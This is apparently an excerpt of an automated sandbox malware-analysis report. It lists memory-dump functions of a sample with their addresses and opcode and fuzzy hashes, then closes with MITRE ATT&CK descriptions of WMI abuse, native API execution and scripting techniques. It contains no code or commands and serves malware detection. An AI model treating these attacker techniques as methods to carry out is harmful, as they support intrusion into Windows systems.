Instruction Fuzzy Hash: 2331C571D1852A8EEBA4EF14C8943A8B2F0BB58381F5451BAD44DA22D1DF346E84CF44

Function 00007FF848F13ED7 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5bf9424344e4f0cd3f15c31790397b235e28d1adf9ff11a4dfe7e29a78208e1
Instruction ID: 79cded6a90b0e14e3bde8b4da39af1dfd67bfa7434258196ce93e6bc65240602
Opcode Fuzzy Hash: e5bf9424344e4f0cd3f15c31790397b235e28d1adf9ff11a4dfe7e29a78208e1
Instruction Fuzzy Hash: C1210530E086298FEB65EB14C8887E9B2B5FF58351F0041FAD48DA22C5CB786EC48F05

Function 00007FF848F5AD4D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1745175d4bade982d97489f0c33c8542bc6101d26d1a084977520c49d3791b81
Instruction ID: 2a67b10199f20d313b8a905fd7d65ab2394db12f4f4197f8956f8b9b80a392c7
Opcode Fuzzy Hash: 1745175d4bade982d97489f0c33c8542bc6101d26d1a084977520c49d3791b81
Instruction Fuzzy Hash: A811003091890A9FEB84FF5CC495AA9F7E1FF98341F544665D009C718ADB34A881CB94

Function 00007FF848F10C40 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09026440d52ea4a07f2a15c03bbb0d8ff1a59142b5929b62cd53546a0f380682
Instruction ID: 225666a0f5dc0e229bef89e02f1c66835a07aa80d27910d8fa62a0f037006cbe
Opcode Fuzzy Hash: 09026440d52ea4a07f2a15c03bbb0d8ff1a59142b5929b62cd53546a0f380682
Instruction Fuzzy Hash: 9E11263590CAAE8EE702FB28D8042EEB760FF81351F044576D841DB2D2DB382909CB99

Function 00007FF848F661F9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c873c336b9563d3cfc2346e8397f27fe79ac68ee02bf3b05b23aceb3acbbf1
Instruction ID: dad237f4b7b555e8d5824b8622e066675af1ca03202fa78ab0d1bce14ec632ee
Opcode Fuzzy Hash: e1c873c336b9563d3cfc2346e8397f27fe79ac68ee02bf3b05b23aceb3acbbf1
Instruction Fuzzy Hash: 66111870808A8D8FDF85EF68C859AAA7FF0FF29301F0505AAE448D71A1DB349954CB91

Function 00007FF848F662D9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c8b82120c026e3e436b693722ffe217eb346fd2bb65401aea62b05dad1ffe3
Instruction ID: c539529d5ece647f99bb16a7ef4d34ef50697410455f1af4737ec470ef3fd1b9
Opcode Fuzzy Hash: 38c8b82120c026e3e436b693722ffe217eb346fd2bb65401aea62b05dad1ffe3
Instruction Fuzzy Hash: 2911EC70808A8D8FDF85EF68C859AE97BF0FF69301F0505AAE408D7191D7359954CB91

Function 00007FF848F15AFF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa1617d34e05ecef3a21f3fca0470f8238f4e82812dfa5be2138bb88f893f52
Instruction ID: 8f8a95eb6d7fa2e280f1b6c38f05406fb53ce1d7fa23cd5cb32a842ba52112e3
Opcode Fuzzy Hash: 2aa1617d34e05ecef3a21f3fca0470f8238f4e82812dfa5be2138bb88f893f52
Instruction Fuzzy Hash: 2B219F3090852D8EEBA4EB14C894BE8B2F1FB54341F5481EA948DE2295DF79AE80CF44

Function 00007FF848F49D39 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f48000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc7a7ab83dc2b6296a128bab79368c478041a74273acda99099c14bc2c677bee
Instruction ID: eac193fb9e183eb1fdc80c5664c105e84702b54bebf96395c5460be388d1d347
Opcode Fuzzy Hash: bc7a7ab83dc2b6296a128bab79368c478041a74273acda99099c14bc2c677bee
Instruction Fuzzy Hash: C1112E7090868D8FDF85EF28C8599A97BF0FF29305F0505ABD449D71A1DB34D954CB41

Function 00007FF848F5B589 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77de06e84f0e962edeaec89f9762993947b3ff21cf4126e8fdd0db2f2fa84501
Instruction ID: c5d8071a08f68dc79551ccb94cc7938d022b1386df2089a590b7dd9df50ad8f4
Opcode Fuzzy Hash: 77de06e84f0e962edeaec89f9762993947b3ff21cf4126e8fdd0db2f2fa84501
Instruction Fuzzy Hash: 5111F77180868D8FCF85EF68C899AAE7BF0FF29301F0545AAE409D7291DB349554CB81

Function 00007FF848F10C48 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3724d3392a58f8539e492300c675be5b05ad7d2e9bb7ca99d199e31339c414e
Instruction ID: 2126b94d0d25ee3942423cc35a16872dcdec222b4bff9fa744b751e0ec9144db
Opcode Fuzzy Hash: f3724d3392a58f8539e492300c675be5b05ad7d2e9bb7ca99d199e31339c414e
Instruction Fuzzy Hash: F901F53590D69E8EE702FB24C8042EEB770FF82310F044576D801DB2D2DB382614CB95

Function 00007FF848F31259 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c750a11567282d74c224f0e45890e6b410cf9681455a5b9c15b106e67d1ae4
Instruction ID: f7a052da54c62e227526f73bcb8418f7200e7972cec9677bb757cd28fc588055
Opcode Fuzzy Hash: 50c750a11567282d74c224f0e45890e6b410cf9681455a5b9c15b106e67d1ae4
Instruction Fuzzy Hash: 8B11D670D0D259CFEB51EB98C9447FDB7F0AF04381F100576E409AA2D5DB78A994CB14

Function 00007FF848F55E89 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f48000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb771732317858d26725adaca5917231587757ab6d521227bdcd3102b2390408
Instruction ID: d548564d89fce7c58ee2c52aefc430079f69a5030af04152d6d7ff74fb1ff90e
Opcode Fuzzy Hash: bb771732317858d26725adaca5917231587757ab6d521227bdcd3102b2390408
Instruction Fuzzy Hash: 9E11FA7190868D8FCF85EF68C859AA97BB0FF29301F0505AAE449D7252D734D554CB81

Function 00007FF848F66DA9 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a22c38dd0600947d0d04d326de1a75863e7e01d0ce14a28b835c031f2e95dd
Instruction ID: b9a955aff347d6b066dc44f0543df12859d50adc38afe7661c8d16392a855865
Opcode Fuzzy Hash: 60a22c38dd0600947d0d04d326de1a75863e7e01d0ce14a28b835c031f2e95dd
Instruction Fuzzy Hash: 86011771908A9D8FCB85EF68C858AAA7BB0FF69301F04019AD408D71A2DB349994CB80

Function 00007FF848F63659 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55008a11837c84d31f4a22778146a94e54e9354560e552b64db6ba723e2d42b8
Instruction ID: dad1b5838a7f954f27daacddf727b3f430478ce2ba743434c93f2f9bbd3cc6d7
Opcode Fuzzy Hash: 55008a11837c84d31f4a22778146a94e54e9354560e552b64db6ba723e2d42b8
Instruction Fuzzy Hash: 2C014C7090C68DCFCB85EF28C858AAA7BF0FF25301F0405AAD418D72A2DB359954CB81

Function 00007FF848F5CFC9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 278d910f22ff007c32b468f5d98ed9503dea84b0f666400bbcfaaa3aa5f66f96
Instruction ID: c9bbf6149b138459cf4f2a61903540bcf30a8642ccbc08874fe2c95cd7fe7ae6
Opcode Fuzzy Hash: 278d910f22ff007c32b468f5d98ed9503dea84b0f666400bbcfaaa3aa5f66f96
Instruction Fuzzy Hash: FB014C30809A8C9FCB45EF28C859AA97FF0FF69301F0501AAD409C71A2DB35D954CB81

Function 00007FF848F66210 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b95530fdf0ba42c42c16fd1bf385ca00127b5472798ab6934c7f02cc8c753663
Instruction ID: 6680602c6ef0e4cb90244f2a313c211879f5b86466a55db7974fa37fa2077a67
Opcode Fuzzy Hash: b95530fdf0ba42c42c16fd1bf385ca00127b5472798ab6934c7f02cc8c753663
Instruction Fuzzy Hash: 4401A870914A4D9FDF84EF68C849AEE7BF0FB68305F00066AA85DE3250DB31E594CB81

Function 00007FF848F662F0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335b39d73e9885d70d0749c624b22727be55b9f1de4e62921017341da768a41d
Instruction ID: 6e211acfc35fdfe43b3f97708746bd12043ce1c042b4477b0c0baa16fd4cf4c2
Opcode Fuzzy Hash: 335b39d73e9885d70d0749c624b22727be55b9f1de4e62921017341da768a41d
Instruction Fuzzy Hash: 2E01A870918A4D9FDF84EF68C849AEEBBF0FF68305F00056AA819D3250DB31E594CB81

Function 00007FF848F5B669 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b322e493b5979ee64cb09f1a717a9422ffc42097c4440205e895b9ce9eb75fe0
Instruction ID: 2e051d98fc287dc59e6a238fdd626f41425527213e4f40acc1caf7df978e6209
Opcode Fuzzy Hash: b322e493b5979ee64cb09f1a717a9422ffc42097c4440205e895b9ce9eb75fe0
Instruction Fuzzy Hash: 7D012C3090868C8FCB85EF24C895AA97FB0EF69301F1500AAD408C7292D735D595CB80

Function 00007FF848F64D49 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6faac8be7fbe180dbdeed7777fc63d42a5887c9ea9d7c5c080c9c12279ce8b5a
Instruction ID: ca2e0f2ea9a4a220e7ceda166bc0a6c8390cf76aedf487dcafcc5a25be9d7e9a
Opcode Fuzzy Hash: 6faac8be7fbe180dbdeed7777fc63d42a5887c9ea9d7c5c080c9c12279ce8b5a
Instruction Fuzzy Hash: 9F014B7190869DCFCB9AEF68C8546E97BB0FF25301F0505EBD418D72A2DB349944CB41

Function 00007FF848F35925 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c14a007a32fbe3bdaf649112042226032c48832a3ef13602e4eabfb985d6c04
Instruction ID: d44144bae78a3603683b2a382a8c45ca5aa1b63d331d7057cc37e7cca0dfbbd8
Opcode Fuzzy Hash: 0c14a007a32fbe3bdaf649112042226032c48832a3ef13602e4eabfb985d6c04
Instruction Fuzzy Hash: F711E570908529CFEB68EF54C8887E8B3B1FB58345F5085EA840EA32D0DB795A85CF15

Function 00007FF848F63189 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a743b8bdc88fb2a8bbf5406fcc6f7c5798793db020539938a4ef4a6081e420a
Instruction ID: c8228f04f5c13c8634edb3c605bfb78b7454121d18456e79d3c374f431ea1a06
Opcode Fuzzy Hash: 3a743b8bdc88fb2a8bbf5406fcc6f7c5798793db020539938a4ef4a6081e420a
Instruction Fuzzy Hash: 57014F3080978C8FCB45DF18C859AA97FF0FF65301F1501DAD408D71A2D7399955CB41

Function 00007FF848F5DC00 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb09dcbe25e4a5313b38c11261d12bd9027951115786b42e5f9f872b046d18a
Instruction ID: c6e63b9d881eb926d664473937a970fa7fa1c3c2a4bf4db2f666dedff010be13
Opcode Fuzzy Hash: 5bb09dcbe25e4a5313b38c11261d12bd9027951115786b42e5f9f872b046d18a
Instruction Fuzzy Hash: BEF0E730914A4C9FCF44EF58C889AEABBF0FB68305F0005AAA80DD3250DB31A594CB81

Function 00007FF848F1A6A5 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625b19e460bc49d3cf44dba7d43ff526bd3d7c1e9c49f5fa29a1d82c46f54070
Instruction ID: 929f9ab24978dcadad95ce12da7d65b8d03d52cae915cdae0a6783ca902301d4
Opcode Fuzzy Hash: 625b19e460bc49d3cf44dba7d43ff526bd3d7c1e9c49f5fa29a1d82c46f54070
Instruction Fuzzy Hash: 3D011B30A0951A9FEB65EB14CC54BE9B6B1EF85351F1042F5D00D962D2DB786EC18F84

Function 00007FF848F66EE9 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317b98d6dc0a3d44a592e2fc4b217baefb675def0aa4c25fde6d051689c7e384
Instruction ID: 64b35c54a6d4bae831b4cf5e03de750f7f85cabad35fd5e8af269245112e2623
Opcode Fuzzy Hash: 317b98d6dc0a3d44a592e2fc4b217baefb675def0aa4c25fde6d051689c7e384
Instruction Fuzzy Hash: CD01AD71C0D6C99FDB52AF2888592A87FA0FF16200F0902FBD408D61D3EB3C54888752

Function 00007FF848F5B680 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92369b18d8b88985854b5f8fb744765031bac5cbdab5400f890081ddb5fcfcb2
Instruction ID: 36232678be163704eee13329bb35c5d365a1b974af54bffe198e58d61c8014e7
Opcode Fuzzy Hash: 92369b18d8b88985854b5f8fb744765031bac5cbdab5400f890081ddb5fcfcb2
Instruction Fuzzy Hash: E8F0BD3091494DDFDF85EF58C448AAABBF1FB68305F1041AAA41DD3150DB31D694CB80

Function 00007FF848F631ED Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1978011fbeeb830c1311157798d618f16fc5adbf259d4e51732c43783236036c
Instruction ID: 1362b88ed814ce2934f285d3fcaa622a3d2c9c5cb520b1e26d2b697727dbc15f
Opcode Fuzzy Hash: 1978011fbeeb830c1311157798d618f16fc5adbf259d4e51732c43783236036c
Instruction Fuzzy Hash: F0F06771A4D6899FCB029F24C8658993FB0EF66300B0A01E7D009CB1A3CB299D0ACB10

Function 00007FF848F305DB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f2b000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f30e8d21b362b8c2419bfa650b3b99307fd115fbe17861a6cb236b8e3d0068e
Instruction ID: f02977efd68f7ae00c6b28c131456f9d2790b197804ed35ff2cb77927978b1b6
Opcode Fuzzy Hash: 6f30e8d21b362b8c2419bfa650b3b99307fd115fbe17861a6cb236b8e3d0068e
Instruction Fuzzy Hash: 53F0E231E0881A8FEB58EB54C854AFDB7B1EB94751F20067BC85693295CF786A418B44

Function 00007FF848F4EA8A Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F48000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F48000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f48000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a0b09f0303e6507b5803ad9be41098098a08eadca0caafba64135719faaa97
Instruction ID: be380a2d8971103c17360db25a0acd3535671c2f57fe363cd3ef4ccf5a0edca4
Opcode Fuzzy Hash: c6a0b09f0303e6507b5803ad9be41098098a08eadca0caafba64135719faaa97
Instruction Fuzzy Hash: 49F0C230D1C4998FE748EB68C59AABDBBE0FF64758F40017AC00EEB2D6CFA424408744

Function 00007FF848F624D0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b619284383ba7722f866dd27ff584af8d5b5bf4ae2c97488cf11a69ccfb06b4
Instruction ID: a4043529097e4a025b8b23797dbc8260f3771506dd05818eab9989b751c491a3
Opcode Fuzzy Hash: 5b619284383ba7722f866dd27ff584af8d5b5bf4ae2c97488cf11a69ccfb06b4
Instruction Fuzzy Hash: E6F0D030914A4D9FDF84EF58C444AEA7BF0FF68305F5041AAE41DD3290DB35A595CB80

Function 00007FF848F13520 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9e78de885504f564e5157959b7d08eed9aeae49c13f76f1574e6cdd7be6a84
Instruction ID: 7b1fdfc56a6604a3797dacf45735370662979bab42b8ee57b687dcb5869e9a63
Opcode Fuzzy Hash: 3b9e78de885504f564e5157959b7d08eed9aeae49c13f76f1574e6cdd7be6a84
Instruction Fuzzy Hash: 1F01E830D4C52B8FEBA4EF18D844AB876A1FF94395F0001B9C01DD26C5CB396E818B04

Function 00007FF848F10D52 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced8a8447f1b6b4ce3a4d77f2f7ce066611247aa10ea711ce79a5149f99a093a
Instruction ID: 6c02d846d735acbe24ec010c0afa7b04901728fc95935ff31f900db7fb77e5ce
Opcode Fuzzy Hash: ced8a8447f1b6b4ce3a4d77f2f7ce066611247aa10ea711ce79a5149f99a093a
Instruction Fuzzy Hash: 17F04930D0D52ACFE704EB54C8443FAB2B0FB91311F040A79D415972C2CB786A848B95

Function 00007FF848F15A6C Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 930eba56ae668985a1e7d7028f55b783b1e319dd1962b819aa55904939355b09
Instruction ID: 95357ff0ba89b2a016f996b6a55dc9a22a3882b8c22f3668d7ae54b96f4049fc
Opcode Fuzzy Hash: 930eba56ae668985a1e7d7028f55b783b1e319dd1962b819aa55904939355b09
Instruction Fuzzy Hash: CBF01C3190812ACEDB64EF00C8907A873F1FB54751F5441B9D04DA62D0DF786E84CF44

Function 00007FF848F675E4 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
Instruction ID: 95685bb8437eca79c1dd0228b960365542510bf5fb37e4420c2eac98ae2c5003
Opcode Fuzzy Hash: 5218bd6d1d5405550a327eb41f20e5663bdc32364e0d3bb550da008f3c3dc5c9
Instruction Fuzzy Hash: A6C01275D198698EF75AEF1C480477562A1FB64A44F0463A1800CE3185EB315C428B08

Function 00007FF848F13A08 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2220080028.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
Instruction ID: 76f3268c14a0b17498a4c0ed87e44403146b43fd8a6c88dd3ec45dc54090dd31
Opcode Fuzzy Hash: 6b02e81f193c9a5659fee60446cc53d614be5c270a38f67b5df4395b29d2d2f6
Instruction Fuzzy Hash: E3E04C70C0D26ACEEB756B1088082B9B564AF11355F1055B9D15D251C1D7795EC58F0A

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

